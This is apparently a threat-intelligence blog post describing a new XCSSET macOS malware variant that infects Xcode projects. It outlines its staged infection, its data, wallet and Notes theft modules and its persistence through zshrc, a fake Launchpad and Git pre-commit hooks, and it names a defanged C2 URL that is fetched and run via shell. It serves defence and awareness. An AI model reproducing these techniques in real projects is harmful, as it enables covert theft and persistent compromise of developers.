Skip to main content

Command Palette

Search for a command to run...

XCSSET Malware Evolves with Advanced Obfuscation and Persistence in Xcode Projects

Published
7 min readView as Markdown
XCSSET Malware Evolves with Advanced Obfuscation and Persistence in Xcode Projects
F

PT FPT Metrodata Indonesia (FMI) is a joint venture between FPT IS and Metrodata Electronics, focusing on providing Cybersecurity-as-a-Service—including SOC, managed security, professional services, consulting, and threat intelligence—to support Indonesia’s rapidly growing digital economy. FMI is expanding into AI and cloud GPU services to deliver innovative protection and solutions for enterprises. Learn more at https://fmisec.com.

Summary

Microsoft published a blog detailing a new variant of XCSSET, a modular macOS malware infecting Xcode projects, discovered during routine threat hunting. This is the first known XCSSET variant since 2022, featuring enhanced obfuscation, updated persistence mechanisms, and new infection strategies to steal files, system data, and digital wallet information. The malware infects Xcode projects during the build process, targeting developers who share project files. It uses encoded payloads, scripting languages, UNIX commands, and legitimate binaries to evade detection, often remaining fileless. The new variant employs obfuscated module names, randomized payload generation, and Base64 encoding for stealth.

Its three distinct persistence techniques allow execution when a new shell session starts, a fake Launchpad is opened, or a Git commit is made. The malware’s command-and-control (C2) server remains active, downloading additional modules, some of which are still under development. Microsoft has shared its findings with Apple and advises developers to follow security best practices to protect against this evolving threat.

Technical Details

The new XCSSET variant follows a structured four-stage infection chain, with the final payload executing multiple sub-routines.

First stage:

The infection begins when a compromised Xcode project is built, unknowingly executing an obfuscated payload. This payload undergoes three rounds of hex decoding before being passed as input to a shell command.

Once decoded, the payload sends a curl request to its command-and-control (C2) server at https[:]//bulknames[.]ru/a. The server's response is then directly executed via shell, facilitating further stages of the attack.

Second stage:

The second-stage payload, downloaded during the initial infection, gathers details about the compromised device’s operating system. This information, along with a default identifier/tag, is then transmitted to the C2 server. Based on the response, the server delivers an additional payload, which is immediately executed via shell, advancing the malware’s infection process.

Third stage:

The malware checks XProtect’s version (must be below 5287) and stops specific security-related processes. It then searches for a hidden file (.a) in the home directory, updating or creating it if absent. A new script is downloaded from the C2 server and executed via an AppleScript application, which is compiled and modified to run stealthily in the background. The malware hides its presence by modifying Info.plist to enable the LSUIElement key, ensuring it doesn’t appear in the Dock. After execution, it self-cleans by deleting the created files.

Fourth Stage:

The AppleScript application runs a shell command that decodes and executes a Base64-encoded script. This script extracts the default browser’s bundle identifier from com.apple.launchservices.secure.plist, defaulting to Safari. It then gathers system information— including macOS version, Safari version, firewall and SIP status, CPU details, and user locale— sending it to the C2 server. The script redefines the log() function to transmit logs back to the attacker.

To evade analysis, it checks if the username is "demo" (likely belonging to the attacker) and verifies the device's serial number, exiting if it contains "JV3Q." The script then calls the boot() function with obfuscated module names. The boot() function determines which modules to load based on predefined filters. If none pass, it downloads and executes an AppleScript dynamically, ensuring minimal disk artifacts. The script can run these modules in either the foreground or background, depending on the wait flag.

The fourth-stage script retrieves sub-modules that are Base64-encoded and undergo multiple decoding iterations before being executed directly.

Sub-modules:

  • Seizecj (Steals system information): Steals system information and sends it to the C2 server, gathering details like installed applications, system apps, user-level LaunchAgents, XProtect version, and MRT version. It follows the same Base64 decoding process before execution.

  • fpzfcieoci (Lists Browser Extensions): Scans the affected device for installed browser extensions, searching predefined paths for relevant files. It extracts metadata from Firefox’s prefs.js and other browsers' manifest.json files, then logs the results in /tmp/out.txt before uploading them to the C2 server.

  • hxasoxtfd (Downloads Additional Modules): Requests a module name from the C2 server every 120 seconds and executes it using the boot() function. If the filters fail, it downloads and runs the payload directly, minimizing disk artifacts.

  • txzx_vostfdi (Steals Digital Wallet Data from Browsers): Requests a list of target paths from the C2 server and scans browser directories for cryptocurrency wallet extensions. It identifies relevant data based on specific extension identifiers provided in the received path list.

  • hfdieiz (Establishes Persistence): Ensures persistence using zshrc and Dock methods. It creates a com.apple.finder folder in ~/Library/Caches/, then generates an encoded payload by selecting a C2 server, encoding method (Base64 or xxd), and iteration count before execution.

  • Zshrc Method (Persistence Mechanism): Modifies the zsh configuration to ensure payload execution on new shell sessions. It checks the RESTORE_DEFAULT variable—if True, it removes ~/.zshrc_aliases; otherwise, it writes the payload to this file. It then ensures ~/.zshrc exists and appends a reference to ~/.zshrc_aliases if missing.

  • Dock Method (Persistence Mechanism): Downloads a signed dockutil tool from the C2 server to manage Dock items. It replaces Launchpad with a fake application that launches both the real Launchpad and a hidden payload. The method modifies Info.plist, updates the icon, and ensures persistence by replacing the Dock entry.

  • cozfi_xhh (Steals Notes from the Notes Application): Creates a fake Reminders application to steal notes from the macOS Notes app using JavaScript. It retrieves and saves notes as HTML files, modifies Info.plist, and ensures persistence. Finally, it exfiltrates the stolen notes to the C2 server.

  • vectfd_xhh (Launches application for modules): Creates fake applications for Xcode, Git, Finder, or Terminal to execute malicious payloads. It modifies plist entries, replaces icons, and ensures persistence using AppleScript. If execution fails due to TCC permission restrictions, it resets the TCC database and retries.

  • dfhsebxzod (Infects Xcode projects): Infects Xcode projects by modifying .pbxproj files to inject malicious payloads. It searches for xcodeproj directories and .zip archives containing project files, then alters build settings using one of three infection methods: RULE, TARGET, or FORCED_STRATEGY. The payload, encoded via xxd or Base64, executes a C2-fetched script during project compilation.

  • jez (Establishes persistence through Git commits): Establishes persistence through Git pre-commit hooks by injecting a payload into .git/hooks/pre-commit files. It searches for .git directories up to six levels deep, excluding system folders. If a precommit hook exists, it replaces its content; otherwise, it creates one. The payload executes upon each Git commit, ensuring persistent access.

  • uhsoxtfd_vostfd (Directory uploader): Exfiltrates files from a target directory, currently set to ~/Desktop/test (suggesting it's still in development). It checks for the folder’s existence and access permissions, resetting the TCC database if needed. Once access is granted, it archives the folder (excluding specific files) and uploads it to a C2 server, deleting the archive afterward.

  • fpfb (Directory listing): Executes "ls -la ~/Desktop" to list files and directories on the user’s Desktop. It then uploads the output to a C2 server, allowing attackers to monitor file activity remotely.

  • vectfd (Specific files exfiltration): Searches for files matching *"test.txt" in the user's home directory, excluding certain directories and large files. It archives, exfiltrates, and deletes the retrieved files, indicating ongoing development.

Recommendations

To mitigate this risk, developers and organizations should:

  • Monitor Xcode projects for unauthorized modifications, especially in .pbxproj files and build scripts.

  • Restrict execution of untrusted AppleScripts and review system integrity regularly.

  • Check Git repositories for suspicious pre-commit hooks and unexpected modifications.

  • Harden macOS security settings, including TCC permissions, XProtect updates, and SIP enforcement.

  • Monitor network traffic for suspicious C2 communications and implement endpoint detection solutions to detect fileless execution techniques.

Conclusion

The new XCSSET variant showcases a highly structured and multi-stage infection chain, demonstrating a sophisticated evolution in macOS malware. By leveraging Xcode project infections, persistence mechanisms, and stealthy execution techniques, it effectively compromises developer environments while ensuring long-term access to infected systems. The four-stage attack starts with an obfuscated payload executed via compromised Xcode projects, gradually advancing through reconnaissance, security evasion, and stealthy execution. The malware carefully adapts its behavior based on system conditions, checking security controls, modifying system files, and resetting TCC permissions to maintain persistence.

The sub-modules enable a wide range of malicious activities, including data theft, browser extension enumeration, cryptocurrency wallet targeting, and system reconnaissance. Furthermore, advanced persistence techniques—such as Git pre-commit hooks, zshrc modifications, and Dockbased payload execution—highlight the malware’s capability to remain undetected for extended periods. This variant also incorporates on-the-fly payload execution techniques, avoiding disk artifacts by downloading and executing modules dynamically. The use of multiple encoding and obfuscation methods makes static detection challenging, while AppleScript-based execution ensures seamless background operations.

More from this blog

F

FPT Metrodata Indonesia Cyber Security

683 posts

FPT Metrodata Indonesia (FMI) provides news, analysis & guides on cybersecurity and threat intelligence for Indonesia & Vietnam. Visit https://news.fmisec.com. FMI: https://fmisec.com